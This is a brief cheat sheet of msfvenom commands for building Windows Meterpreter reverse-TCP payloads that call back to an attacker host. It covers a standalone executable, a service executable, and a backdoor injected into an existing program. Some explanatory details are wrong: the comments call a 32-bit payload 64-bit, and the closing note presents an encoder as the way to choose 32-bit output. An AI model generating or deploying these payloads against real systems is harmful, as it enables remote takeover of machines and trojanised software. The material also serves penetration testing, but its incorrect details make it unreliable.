How to exploit Windows executables with msfvenom

# 64-bit Windows executable meterpreter payload
#
msfvenom -p windows/meterpreter/reverse_tcp \
	LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
	-f exe -o ${NAME}.exe
 
# 64-bit Windows SERVICE executable (note that these require
# additional API calls to work, beyond what `-f exe` provides)
#
msfvenom -p windows/meterpreter/reverse_tcp \
	LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
	-f exe-service -o ${NAME}.exe
 
# Add a meterpreter backdoor to an existing executable
#
msfvenom -a x64 --platform windows -x $ORIGINAL_EXE -k \
	-p windows/meterpreter/reverse_tcp \
	LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
	-b "\x00" -f exe -o $BACKDOORED_EXE

Note that by default msfvenom produces 64-bit executables when using the -f exe. This doesn’t work, however, if you’re trying to replace a program in Program Files (x86). In this case, you’ll need to explicitly instruct msfvenom to encode a 32-bit binary using -e x86/shikata_ga_nai.